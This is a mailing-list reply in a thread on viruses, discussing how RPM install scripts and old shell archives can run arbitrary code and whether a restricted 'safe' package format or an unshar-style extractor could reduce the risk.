Re: Viruses



Alan Shutko <ats@acm.org> writes:

> There's the rub.  RPM pre and post install/uninstall scripts can do
> anything they want.  It's not obvious to me how one would look at
> those scripts when getting a package, though I assume you could
> rpm2cpio it and look.  But not many people are going to do that, so
> it's a vulnerability.

How necessary a vulnerability is it?  How many sorts of
install/uninstall scripts are there?  (i.e., how feasible would a
"safe" rpm be---one that could just run ldconfig if asked, say?)

I guess I'm thinking of something similar to the (probably obsolete
nowadays) problem of shell archives (shar).  Once upon a time, it was
quite usual to get source encoded as a shell script (think large
"here" documents, and sed, and things), which you could run to extract
the source.  This was something of a security hole, and there was an
unshar program, which could understand enough of the shell script used
when constructing shell archives to extract the source, but which
wouldn't do nasty things.



[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]